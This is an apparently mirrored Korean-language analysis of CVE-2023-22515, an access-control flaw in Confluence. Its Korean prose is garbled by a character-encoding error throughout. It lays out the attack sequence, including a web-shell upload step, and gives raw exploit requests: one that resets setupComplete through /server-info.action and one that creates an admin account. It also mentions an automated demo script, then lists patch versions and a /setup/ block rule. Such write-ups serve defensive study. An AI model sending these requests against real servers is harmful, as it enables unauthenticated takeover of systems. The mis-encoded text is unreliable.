Share
## https://sploitus.com/exploit?id=8C5F771B-5BCB-5AF4-9185-9EEF9EDFEFEF
# ๐ก๏ธ CVE-2023-22515: Confluence ๊ถํ ์์น ์ทจ์ฝ์ ์ฌ์ธต ๋ถ์
> [!IMPORTANT]
> **๊ธด๊ธ ๋ณด์ ๊ฒฝ๊ณ **: ์ด ์ทจ์ฝ์ ์ CVSS ์ค์ฝ์ด **10.0 (Critical)**์ ์ต๊ณ ์ํ๋ ์ทจ์ฝ์ ์
๋๋ค. ์ํฅ์ ๋ฐ๋ ๋ฒ์ ์ ์ฌ์ฉ ์ค์ธ ๊ฒฝ์ฐ ์ฆ๊ฐ์ ์ธ ํจ์น๊ฐ ํ์ํฉ๋๋ค.
## 1. ๊ฐ์ (Overview)
**CVE-2023-22515**๋ Atlassian Confluence Data Center ๋ฐ Server์์ ๋ฐ๊ฒฌ๋ ์น๋ช
์ ์ธ **Broken Access Control** ์ทจ์ฝ์ ์
๋๋ค. ๊ณต๊ฒฉ์๋ ์ธ์ฆ ์์ด ์๊ฒฉ์ผ๋ก ์๋ฒ์ ์ค์ ์ํ๋ฅผ ์กฐ์ํ์ฌ ๊ด๋ฆฌ์ ๊ณ์ ์ ์์ฑํ๊ณ , ์์คํ
์ ์์ ํ ์ฅ์
ํ ์ ์์ต๋๋ค.
| ํญ๋ชฉ | ์์ธ ๋ด์ฉ |
|------|-----------|
| **์ทจ์ฝ์ ID** | CVE-2023-22515 |
| **์ํ๋** | CRITICAL (CVSS 10.0) |
| **์ํฅ ๋ฒ์ ** | 8.0.0 ~ 8.5.1 (์ธ๋ถ ๋ฒ์ ํ์ธ ํ์) |
| **๊ณต๊ฒฉ ์ ํ** | ์ธ์ฆ ์ฐํ ๋ฐ ๊ถํ ์์น |
## 2. ๊ณต๊ฒฉ ๋ฉ์ปค๋์ฆ (Attack Mechanism)
์ด ์ทจ์ฝ์ ์ ๊ณต๊ฒฉ์๊ฐ `/server-info.action` ์๋ํฌ์ธํธ๋ฅผ ํตํด `bootstrapStatusProvider.applicationConfig.setupComplete` ๊ฐ์ `false`๋ก ๋ณ๊ฒฝํจ์ผ๋ก์จ ํธ๋ฆฌ๊ฑฐ๋ฉ๋๋ค.
### ๐ ๊ณต๊ฒฉ ์ํ์ค ๋ค์ด์ด๊ทธ๋จ
```mermaid
sequenceDiagram
participant Attacker as ๐ ๊ณต๊ฒฉ์
participant Server as ๐ฅ๏ธ Confluence ์๋ฒ
participant Config as โ๏ธ ์ค์ ๊ด๋ฆฌ์
Note over Attacker, Server: 1๋จ๊ณ: ์ค์ ์ํ ์ด๊ธฐํ ๊ณต๊ฒฉ
Attacker->>Server: GET /server-info.action?setupComplete=false
Server->>Config: ๋ฉ๋ชจ๋ฆฌ ์์ ์ค์ ์๋ฃ ํ๋๊ทธ ํด์
Config-->>Server: ์ํ ๋ณ๊ฒฝ ์๋ฃ (์ค์น ๋ชจ๋๋ก ์ ํ)
Server-->>Attacker: HTTP 200/302 OK
Note over Attacker, Server: 2๋จ๊ณ: ๊ด๋ฆฌ์ ๊ณ์ ์์ฑ
Attacker->>Server: POST /setup/setupadministrator.action(์๋ก์ด ๊ด๋ฆฌ์ ์ ๋ณด ์ ์ก)
Server->>Server: ๋ณด์ ๊ฒ์ฆ ์ฐํ (์ค์น ๋ชจ๋๋ผ ํ์ฉ๋จ)
Server-->>Attacker: ๊ณ์ ์์ฑ ์ฑ๊ณต ๋ฐ ๋ก๊ทธ์ธ
Note over Attacker, Server: 3๋จ๊ณ: ์์คํ
์ฅ์
(RCE)
Attacker->>Server: ์
์ฑ ํ๋ฌ๊ทธ์ธ ์
๋ก๋ (Web Shell)
Server-->>Attacker: ์๊ฒฉ ๋ช
๋ น ์คํ ๊ถํ ํ๋
```
> [!NOTE]
> **ํต์ฌ ์๋ฆฌ**: ์๊ตฌ์ ์ธ ์ค์ ํ์ผ(`confluence.cfg.xml`)์ ์์ ํ๋ ๊ฒ์ด ์๋๋ผ, **๋ฉ๋ชจ๋ฆฌ ์์ ๋ฐํ์ ์ํ**๋ฅผ ๋ณ๊ฒฝํ์ฌ ์ ๊ทผ ์ ์ด ๋ก์ง์ ์ฐํํ๋ ๋ฐฉ์์
๋๋ค.
## 3. ์์ธ ๋ถ์ (Technical Analysis)
### ์์ธ (Root Cause)
XWork2 ํ๋ ์์ํฌ์ ํ๋ผ๋ฏธํฐ ๋ฐ์ธ๋ฉ ์ทจ์ฝ์ ๊ณผ Confluence์ ์ก์
(Action) ํด๋์ค(`ServerInfoAction`)์์ ๋ฏผ๊ฐํ ์์ฑ(`setupComplete`)์ ๋ํ ์ธ๋ถ ์
๋ ฅ ๊ฒ์ฆ์ด ๋๋ฝ๋์ด ๋ฐ์ํ์ต๋๋ค.
### HTTP ์์ฒญ ์์
๊ณต๊ฒฉ์๋ ๋จ์ํ HTTP ์์ฒญ๋ง์ผ๋ก ์๋ฒ๋ฅผ ๋ฌด๋ ฅํํ ์ ์์ต๋๋ค.
**1. ์ค์ ์ด๊ธฐํ ์์ฒญ:**
```http
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com
```
**2. ๊ด๋ฆฌ์ ์์ฑ ์์ฒญ:**
```http
POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...
```
## 4. ์ทจ์ฝ์ ์ฌํ (PoC & Demo)
๋ณธ ๋ณด๊ณ ์์ ํจ๊ป ์ ๊ณต๋๋ ์ฌํ ํคํธ(`cve-2023-22515-repro`)๋ฅผ ํตํด ์์ ํ Docker ํ๊ฒฝ์์ ์ทจ์ฝ์ ์ ์ค์ตํ ์ ์์ต๋๋ค.
### ๐ฅ Cinematic Demo
ํฐ๋ฏธ๋์์ ์ค์ ํดํน ๊ณผ์ ์ ์๊ฐ์ ์ผ๋ก ํ์ธํ ์ ์๋ ๋ฐ๋ชจ ์คํฌ๋ฆฝํธ๊ฐ ํฌํจ๋์ด ์์ต๋๋ค.
```bash
# ๋ฐ๋ชจ ์คํ ๋ช
๋ น์ด
bash cinematic_pwn.sh
```
> [!TIP]
> ๋ฐ๋ชจ ์คํฌ๋ฆฝํธ๋ ์ค์ ์๋ฒ(`localhost:8090`)์ ๊ณต๊ฒฉ์ ์ํํ์ฌ ๊ด๋ฆฌ์ ๊ณ์ ์ ์์ฑํ๊ณ ๋ก๊ทธ์ธ๊น์ง ์๋ํ๋ ์ ๊ณผ์ ์ ์๋ํํ์ฌ ๋ณด์ฌ์ค๋๋ค.
## 5. ๋์ ๋ฐฉ์ (Mitigation)
### โ
์ต์ ํจ์น ์ ์ฉ (๊ถ์ฅ)
๊ฐ์ฅ ํ์คํ ํด๊ฒฐ์ฑ
์ Atlassian์์ ์ ๊ณตํ๋ ์์ ๋ ๋ฒ์ ์ผ๋ก ์
๊ทธ๋ ์ด๋ํ๋ ๊ฒ์
๋๋ค.
- **8.3.3 ๋ฒ์ ์ด์**
- **8.4.3 ๋ฒ์ ์ด์**
- **8.5.2 ๋ฒ์ ์ด์**
### โ ๏ธ ์์ ์ํ ์กฐ์น
ํจ์น๊ฐ ์ด๋ ค์ด ๊ฒฝ์ฐ, ๋คํธ์ํฌ ๋ณด์ ์ฅ๋น(WAF, ๋ก๋๋ฐธ๋ฐ์ ๋ฑ)์์ ๋ค์ URL ํจํด์ ๋ํ ์ ๊ทผ์ ์ฐจ๋จํ์ญ์์ค.
- `*/setup/*`
## 6. ๊ฒฐ๋ก (Conclusion)
CVE-2023-22515๋ ๊ณต๊ฒฉ ๋์ด๋๊ฐ ๋งค์ฐ ๋ฎ์ผ๋ฉด์๋ ์์คํ
์์ ์ฅ์
์ด ๊ฐ๋ฅํ ์น๋ช
์ ์ธ ์ทจ์ฝ์ ์
๋๋ค. ๋ณด์ ๋ด๋น์๋ ์ฆ์ ํจ์น๋ฅผ ์ ์ฉํ๊ณ , ์นจํด ์ฌ๊ณ ์ฌ๋ถ๋ฅผ ๋ชจ๋ํฐ๋งํด์ผ ํฉ๋๋ค.
---
*์์ฑ์ผ: 2026-01-16 | ์์ฑ์: Antigravity Security Analysis Team*